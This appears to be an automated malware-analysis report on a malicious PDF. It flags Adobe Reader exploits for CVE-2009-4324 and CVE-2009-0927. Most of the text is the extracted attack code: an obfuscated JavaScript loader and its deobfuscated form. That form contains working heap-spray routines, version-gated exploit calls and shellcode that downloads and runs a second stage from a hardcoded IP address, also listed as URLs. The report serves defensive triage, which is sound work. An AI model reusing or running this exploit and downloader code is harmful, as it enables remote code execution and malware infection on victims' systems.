MALICIOUS
Risk Score: 310
Malware Insights
MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple CVEs (CVE-2009-4324 and CVE-2009-0927) in Adobe Reader, specifically targeting the `media.newPlayer` and `Collab.getIcon` functions. The deobfuscated JavaScript contains URLs that are likely used to download and execute a second-stage payload. The primary function of this exploit is to achieve arbitrary code execution via a known vulnerability.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)
- media.newPlayer — CVE-2009-4324 (critical; CVE exact; rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical; CVE exact; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g (Referenced by PDF JavaScript)
  - http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=n (Referenced by PDF JavaScript)
Extracted artifacts (3)
Files carved from inside the sample during analysis.
Artifact: javascript_obj0076_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 76 at offset 0x38A
- Size: 12615 bytes
- SHA-256: dd75c17a4dbc7284c769e849355e3c373ec2e5a543d8c1f0398a22847319dc35
Preview script (first 1,000 lines of the extracted script):
a="l=a}bu2n>9NAe0BDp4gd3:ysm.-t)S<fhc_{P( ,1']vxC8@7Fw5E%Vo[6r;I&+|i";
w='';
w+='sl';
w+='i';
w+="c"+a[12];
j='b343tb3g';
j=j[w];
z
=new Array
(43,2,58,38,34,40,55,1,41,53,5,46,20,57,57,53,5,49,45,52,17,53,5,46,51,49,45,53,5,48,51,52,17,53,5,52,9,20,17,53,5,20,20,51,49,53,5,57,17,45,13,53,5,17,13,46,14,53,5,46,14,20,13,53,5,13,45,17,13,53,5,48,13,46,14,53,5,51,57,40,45,53,5,48,57,46,14,53,5,20,20,13,46,53,5,57,57,15,14,53,5,51,52,46,14,53,5,13,20,20,45,53,5,20,20,48,17,53,5,46,40,6,45,53,5,40,51,52,52,53,5,49,49,40,13,53,5,14,46,49,49,53,5,17,13,46,14,53,5,45,20,20,13,53,5,20,9,17,57,53,5,48,51,13,57,53,5,46,48,49,14,53,5,6,17,20,17,53,5,52,17,46,51,53,5,51,40,48,51,53,5,52,14,52,9,53,5,51,40,17,45,53,5,46,14,51,57,53,5,20,45,48,51,53,5,48,17,46,14,53,5,48,46,20,51,53,5,49,51,13,20,53,5,46,14,51,57,53,5,6,13,48,57,53,5,49,51,13,20,53,5,45,9,20,20,53,5,17,40,17,9,53,5,11,15,49,45,53,5,45,51,13,20,53,5,15,14,20,20,53,5,14,52,13,49,53,5,20,46,40,13,53,5,48,17,49,6,53,5,45,40,13,46,53,5,13,15,45,14,53,5,15,11,13,20,53,5,52,14,17,13,53,5,20,14,49,40,53,5,48,51,40,49,53,5,51,52,52,57,53,5,51,52,46,14,53,5,13,20,6,17,53,5,57,57,15,15,53,5,13,45,46,14,53,5,46,15,17,14,53,5,52,45,17,57,53,5,51,17,49,49,53,5,13,45,6,17,53,5,15,46,46,14,53,5,15,15,13,20,53,5,13,17,46,14,53,5,13,20,46,14,53,5,11,14,45,51,53,5,51,9,51,52,53,5,52,14,45,20,53,5,11,15,51,20,53,5,57,46,46,14,53,5,46,13,6,13,53,5,13,45,48,15,53,5,48,17,20,20,53,5,9,57,13,20,53,5,49,20,52,14,53,5,57,46,46,14,53,5,46,14,13,46,53,5,57,11,49,48,53,5,51,9,13,51,53,5,9,46,52,46,53,5,49,49,49,49,53,5,52,6,49,49,53,5,52,46,49,9,53,5,13,13,13,13,53,5,13,13,13,13,53,5,51,13,51,46,53,5,17,13,57,11,53,5,49,49,57,46,53,5,13,13,13,13,53,5,51,13,13,13,53,5,45,13,46,20,53,5,51,13,40,9,53,5,46,14,51,51,53,5,46,14,52,45,53,5,40,13,51,52,53,5,45,20,46,20,53,5,49,49,13,51,53,5,57,46,52,20,53,5,57,52,57,49,53,5,13,13,13,13,53,5,48,51,57,46,53,5,57,45,48,6,53,5,51,17,57,15,53,5,40,57,49,49,53,5,45,17,46,20,53,5,46,14,13,46,53,5,52,46,52,46,53,5,49,49,57,40,53,5,49,49,49,49,53,5,13,6,52,14,53,5,48,6,52,14,53,5,52,45,46,40,53,5,13,40,13,17,53,5,13,13,13,13,53,5,51,45,46,15,53,5,13
,45,6,17,53,5,13,17,45,48,53,5,48,6,6,17,53,5,57,48,57,51,53,5,45,48,48,20,53,5,6,17,17,17,53,5,48,57,13,17,53,5,20,20,48,6,53,5,45,48,20,6,53,5,6,17,17,17,53,5,6,13,13,46,53,5,48,20,6,15,53,5,51,20,6,13,53,5,49,46,57,46,53,5,13,13,13,13,53,5,49,49,13,13,53,5,13,45,51,57,53,5,52,46,46,14,53,5,45,9,20,20,53,5,45,48,51,40,53,5,40,15,17,17,53,5,48,48,13,13,53,5,57,6,48,13,53,5,45,48,48,17,53,5,40,15,17,17,53,5,6,52,13,51,53,5,57,45,57,17,53,5,45,57,57,45,53,5,40,15,17,17,53,5,13,13,13,9,53,5,46,11,51,9,53,5,13,17,45,40,53,5,46,46,20,13,53,5,40,15,17,17,53,5,17,40,13,17,53,5,57,11,51,40,53,5,57,11,13,13,53,5,51,20,13,13,53,5,57,11,51,48,53,5,49,49,13,13,53,5,40,17,51,57,53,5,45,13,46,51,53,5,40,57,48,51,53,5,13,13,57,11,53,5,49,49,51,20,53,5,13,17,51,57,53,5,13,13,57,11,53,5,52,14,46,20,53,5,51,20,13,45,53,5,51,57,49,49,53,5,46,20,13,17,53,5,13,45,45,20,53,5,13,6,52,14,53,5,40,20,52,14,53,5,46,13,17,48,53,5,13,13,20,49,53,5,49,11,48,51,53,5,46,13,17,48,53,5,13,13,20,49,53,5,45,17,48,51,53,5,13,13,57,11,53,5,49,52,57,11,53,5,51,57,49,49,53,5,52,46,13,46,53,5,49,52,9,45,53,5,49,49,49,49,53,5,17,52,46,52,53,5,52,45,13,52,53,5,49,52,9,46,53,5,13,52,46,11,53,5,57,49,46,9,53,5,14,15,13,40,53,5,45,11,20,20,53,5,51,14,46,11,53,5,45,57,40,14,53,5,48,9,17,57,53,5,40,11,20,57,53,5,48,13,6,49,53,5,48,17,57,46,53,5,48,13,48,17,53,5,6,49,20,11,53,5,20,9,6,49,53,5,6,52,20,40,53,5,20,6,20,6,53,5,6,52,20,46,53,5,20,20,20,40,53,5,6,52,20,20,53,5,20,57,20,51,53,5,57,17,6,49,53,5,57,48,57,52,53,5,20,9,20,6,53,5,20,9,20,13,53,5,20,40,20,40,53,5,57,17,6,49,53,5,20,40,57,6,53,5,20,6,20,51,53,5,20,17,20,20,53,5,20,46,20,9,53,5,57,57,57,17,53,5,20,9,20,48,53,5,20,51,20,57,53,5,20,17,57,40,53,5,57,20,57,20,53,5,20,46,57,17,53,5,57,6,57,40,53,5,20,17,57,20,53,5,20,20,20,20,53,5,20,48,20,9,53,5,20,57,57,57,53,5,6,49,57,17,53,5,20,48,57,17,53,5,48,13,6,52,53,5,48,13,57,46,53,5,57,57,20,49,53,5,57,48,20,15,53,5,13,13,13,13,41,59,43,2,58,38,34,6,55,1,41,53,5,46,20,57,57,53,5,49,45,52,17,53,5,46,51,49
,45,53,5,48,51,52,17,53,5,52,9,20,17,53,5,20,20,51,49,53,5,57,17,45,13,53,5,17,13,46,14,53,5,46,14,20,13,53,5,13,45,17,13,53,5,48,13,46,14,53,5,51,57,40,45,53,5,48,57,46,14,53,5,20,20,13,46,53,5,57,57,15,14,53,5,51,52,46,14,53,5,13,20,20,45,53,5,20,20,48,17,53,5,46,40,6,45,53,5,40,51,52,52,53,5,49,49,40,13,53,5,14,46,49,49,53,5,17,13,46,14,53,5,45,20,20,13,53,5,20,9,17,57,53,5,48,51,13,57,53,5,46,48,49,14,53,5,6,17,20,17,53,5,52,17,46,51,53,5,51,40,48,51,53,5,52,14,52,9,53,5,51,40,17,45,53,5,46,14,51,57,53,5,20,45,48,51,53,5,48,17,46,14,53,5,48,46,20,51,53,5,49,51,13,20,53,5,46,14,51,57,53,5,6,13,48,57,53,5,49,51,13,20,53,5,45,9,20,20,53,5,17,40,17,9,53,5,11,15,49,45,53,5,45,51,13,20,53,5,15,14,20,20,53,5,14,52,13,49,53,5,20,46,40,13,53,5,48,17,49,6,53,5,45,40,13,46,53,5,13,15,45,14,53,5,15,11,13,20,53,5,52,14,17,13,53,5,20,14,49,40,53,5,48,51,40,49,53,5,51,52,52,57,53,5,51,52,46,14,53,5,13,20,6,17,53,5,57,57,15,15,53,5,13,45,46,14,53,5,46,15,17,14,53,5,52,45,17,57,53,5,51,17,49,49,53,5,13,45,6,17,53,5,15,46,46,14,53,5,15,15,13,20,53,5,13,17,46,14,53,5,13,20,46,14,53,5,11,14,45,51,53,5,51,9,51,52,53,5,52,14,45,20,53,5,11,15,51,20,53,5,57,46,46,14,53,5,46,13,6,13,53,5,13,45,48,15,53,5,48,17,20,20,53,5,9,57,13,20,53,5,49,20,52,14,53,5,57,46,46,14,53,5,46,14,13,46,53,5,57,11,49,48,53,5,51,9,13,51,53,5,9,46,52,46,53,5,49,49,49,49,53,5,52,6,49,49,53,5,52,46,49,9,53,5,13,13,13,13,53,5,13,13,13,13,53,5,51,13,51,46,53,5,17,13,57,11,53,5,49,49,57,46,53,5,13,13,13,13,53,5,51,13,13,13,53,5,45,13,46,20,53,5,51,13,40,9,53,5,46,14,51,51,53,5,46,14,52,45,53,5,40,13,51,52,53,5,45,20,46,20,53,5,49,49,13,51,53,5,57,46,52,20,53,5,57,52,57,49,53,5,13,13,13,13,53,5,48,51,57,46,53,5,57,45,48,6,53,5,51,17,57,15,53,5,40,57,49,49,53,5,45,17,46,20,53,5,46,14,13,46,53,5,52,46,52,46,53,5,49,49,57,40,53,5,49,49,49,49,53,5,13,6,52,14,53,5,48,6,52,14,53,5,52,45,46,40,53,5,13,40,13,17,53,5,13,13,13,13,53,5,51,45,46,15,53,5,13,45,6,17,53,5,13,17,45,48,53,5,48,6,6,17,53,5,57,48,57,51,53,5,45,48,48,2
0,53,5,6,17,17,17,53,5,48,57,13,17,53,5,20,20,48,6,53,5,45,48,20,6,53,5,6,17,17,17,53,5,6,13,13,46,53,5,48,20,6,15,53,5,51,20,6,13,53,5,49,46,57,46,53,5,13,13,13,13,53,5,49,49,13,13,53,5,13,45,51,57,53,5,52,46,46,14,53,5,45,9,20,20,53,5,45,48,51,40,53,5,40,15,17,17,53,5,48,48,13,13,53,5,57,6,48,13,53,5,45,48,48,17,53,5,40,15,17,17,53,5,6,52,13,51,53,5,57,45,57,17,53,5,45,57,57,45,53,5,40,15,17,17,53,5,13,13,13,9,53,5,46,11,51,9,53,5,13,17,45,40,53,5,46,46,20,13,53,5,40,15,17,17,53,5,17,40,13,17,53,5,57,11,51,40,53,5,57,11,13,13,53,5,51,20,13,13,53,5,57,11,51,48,53,5,49,49,13,13,53,5,40,17,51,57,53,5,45,13,46,51,53,5,40,57,48,51,53,5,13,13,57,11,53,5,49,49,51,20,53,5,13,17,51,57,53,5,13,13,57,11,53,5,52,14,46,20,53,5,51,20,13,45,53,5,51,57,49,49,53,5,46,20,13,17,53,5,13,45,45,20,53,5,13,6,52,14,53,5,40,20,52,14,53,5,46,13,17,48,53,5,13,13,20,49,53,5,49,11,48,51,53,5,46,13,17,48,53,5,13,13,20,49,53,5,45,17,48,51,53,5,13,13,57,11,53,5,49,52,57,11,53,5,51,57,49,49,53,5,52,46,13,46,53,5,49,52,9,45,53,5,49,49,49,49,53,5,17,52,46,52,53,5,52,45,13,52,53,5,49,52,9,46,53,5,13,52,46,11,53,5,57,49,46,9,53,5,14,15,13,40,53,5,45,11,20,20,53,5,51,14,46,11,53,5,45,57,40,14,53,5,48,9,17,57,53,5,40,11,20,57,53,5,48,13,6,49,53,5,48,17,57,46,53,5,48,13,48,17,53,5,6,49,20,11,53,5,20,9,6,49,53,5,6,52,20,40,53,5,20,6,20,6,53,5,6,52,20,46,53,5,20,20,20,40,53,5,6,52,20,20,53,5,20,57,20,51,53,5,57,17,6,49,53,5,57,48,57,52,53,5,20,9,20,6,53,5,20,9,20,13,53,5,20,40,20,40,53,5,57,17,6,49,53,5,20,40,57,6,53,5,20,6,20,51,53,5,20,17,20,20,53,5,20,46,20,9,53,5,57,57,57,17,53,5,20,9,20,48,53,5,20,51,20,57,53,5,20,17,57,40,53,5,57,20,57,20,53,5,20,46,57,17,53,5,57,6,57,40,53,5,20,17,57,20,53,5,20,20,20,20,53,5,20,48,20,9,53,5,20,57,57,57,53,5,6,49,57,17,53,5,20,46,57,17,53,5,48,13,6,52,53,5,48,13,57,46,53,5,57,57,20,49,53,5,57,52,20,15,53,5,13,13,13,13,41,59,31,5,7,33,27,64,55,7,38,34,20,55,37,28,35,43,2,58,38,34,17,55,1,2,16,16,25,43,64,12,50,12,58,54,12,58,23,64,55,7,25,27,55,29,27,58,64,7,18,37,28
,59,34,17,55,1,34,17,55,25,58,12,16,0,2,33,12,37,41,25,41,39,41,41,28,59,50,32,64,0,12,37,34,17,55,25,0,12,7,18,27,32,30,17,28,35,34,17,55,62,1,41,13,41,59,3,34,17,55,1,16,2,58,23,12,60,7,27,37,34,17,55,39,40,13,28,59,58,12,27,5,58,7,38,34,17,55,59,3,31,5,7,33,27,64,55,7,38,34,51,55,37,28,35,31,5,7,33,27,64,55,7,38,34,57,55,37,28,35,43,2,58,38,34,48,55,1,41,16,47,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,38,21,38,22,22,22,22,40,40,40,41,59,5,27,64,0,25,16,58,64,7,27,19,37,34,48,55,39,7,12,50,38,15,2,27,12,37,28,28,59,3,43,2,58,38,34,46,55,1,40,6,13,13,13,59,34,9,55,1,7,12,50,38,11,58,58,2,22,37,28,59,43,2,58,38,34,40,55,13,1,41,53,5,9,13,9,13,53,5,9,13,9,13,41,59,43,2,58,38,34,40,55,40,1,34,6,55,59,34,40,55,13,1,5,7,12,23,33,2,16,12,37,34,40,55,13,28,59,34,40,55,40,1,5,7,12,23,33,2,16,12,37,34,40,55,40,28,59,50,32,64,0,12,37,34,40,55,13,25,0,12,7,18,27,32,30,1,13,44,46,13,13,13,28,35,34,40,55,13,62,1,34,40,55,13,59,3,34,40,55,13,1,34,40,55,13,25,23,5,4,23,27,58,37,13,39,13,44,46,13,13,13,26,34,40,55,40,25,0,12,7,18,27,32,28,59,38,31,55,58,37,34,40,55,6,1,13,59,34,40,55,6,30,34,46,55,59,34,40,55,6,62,62,28,35,34,9,55,56,34,40,55,6,42,1,34,40,55,13,62,34,40,55,40,59,3,64,31,37,34,46,55,28,35,34,57,55,37,28,59,34,57,55,37,28,59,27,58,22,35,27,32,64,23,25,24,12,19,64,2,25,7,12,50,36,0,2,22,12,58,37,7,5,0,0,28,59,3,33,2,27,33,32,37,12,28,35,3,34,57,55,37,28,59,3,3,31,5,7,33,27,64,55,7,38,34,40,55,20,37,28,35,43,2,58,38,34,40,55,17,1,5,7,12,23,33,2,16,12,37,34,40,55,28,59,34,40,55,51,1,5,7,12,23,33,2,16,12,37,41,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,
5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,41,28,62,34,40,55,17,59,34,40,55,57,1,5,7,12,23,33,2,16,12,37,41,53,5,9,13,9,13,53,5,9,13,9,13,41,28,59,34,40,55,48,1,40,13,59,34,40,55,46,1,34,40,55,48,62,34,40,55,51,25,0,12,7,18,27,32,59,50,32,64,0,12,37,34,40,55,57,25,0,12,7,18,27,32,30,34,40,55,46,28,34,40,55,57,62,1,34,40,55,57,59,34,40,55,9,1,34,40,55,57,25,23,5,4,23,27,58,64,7,18,37,13,39,34,40,55,46,28,59,34,6,55,6,1,34,40,55,57,25,23,5,4,23,27,58,64,7,18,37,13,39,34,40,55,57,25,0,12,7,18,27,32,26,34,40,55,46,28,59,50,32,64,0,12,37,34,6,55,6,25,0,12,7,18,27,32,62,34,40,55,46,30,13,44,17,13,13,13,13,28,34,6,55,6,1,34,6,55,6,62,34,6,55,6,62,34,40,55,9,59,34,6,55,13,1,7,12,50,38,11,58,58,2,22,37,28,59,31,55,58,37,34,6,55,40,1,13,59,34,6,55,40,30,40,46,13,59,34,6,55,40,62,62,28,34,6,55,13,56,34,6,55,40,42,1,34,6,55,6,62,34,40,55,51,59,43,2,58,38,34,6,55,20,1,17,13,40,6,59,43,2,58,38,34,6,55,17,1,11,58,58,2,22,37,34,6,55,20,28,59,31,55,58,37,34,6,55,40,1,13,59,34,6,55,40,30,34,6,55,20,59,34,6,55,40,62,62,28,35,34,6,55,17,56,34,6,55,40,42,1,5,7,12,23,33,2,16,12,37,41,53,13,2,53,13,2,53,13,2,53,13,2,41,28,59,3,45,55,0,0,2,4,25,18,12,27,60,33,55,7,37,34,6,55,17,62,41,34,10,25,4,5,7,19,0,12,41,28,59,3,43,2,58,38,34,17,55,1,34,20,55,37,28,59,64,31,37,37,37,34,17,55,8,46
,9,51,13,28,61,61,37,34,17,55,30,9,13,51,13,28,28,63,63,37,37,34,17,55,8,1,46,13,13,13,28,61,61,37,34,17,55,30,1,46,40,13,6,28,28,28,35,34,40,55,20,37,28,59,3,12,0,23,12,38,64,31,37,37,34,17,55,8,1,9,40,13,13,28,63,63,37,34,17,55,30,1,9,6,13,13,28,63,63,37,34,17,55,8,1,46,40,13,20,28,63,63,37,34,17,55,30,1,46,40,13,48,28,28,35,34,51,55,37,28,59,3);
s='';
b
=
'al';
b2
=a[12]
+
a[43]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
Artifact: generic_stage_recovery_000.js
- Kind: deobfuscated-js
- Source: generic stage recovery (alphabet-index-array) from JavaScript object 76 at offset 0x38A
- Size: 4469 bytes
- SHA-256: 3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var 
_2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var 
_1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
Artifact: generic_stage_recovery_001.js
- Kind: deobfuscated-js
- Source: generic stage recovery (percent-decode) from JavaScript object 76 at offset 0x38A
- Size: 4461 bytes
- SHA-256: eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
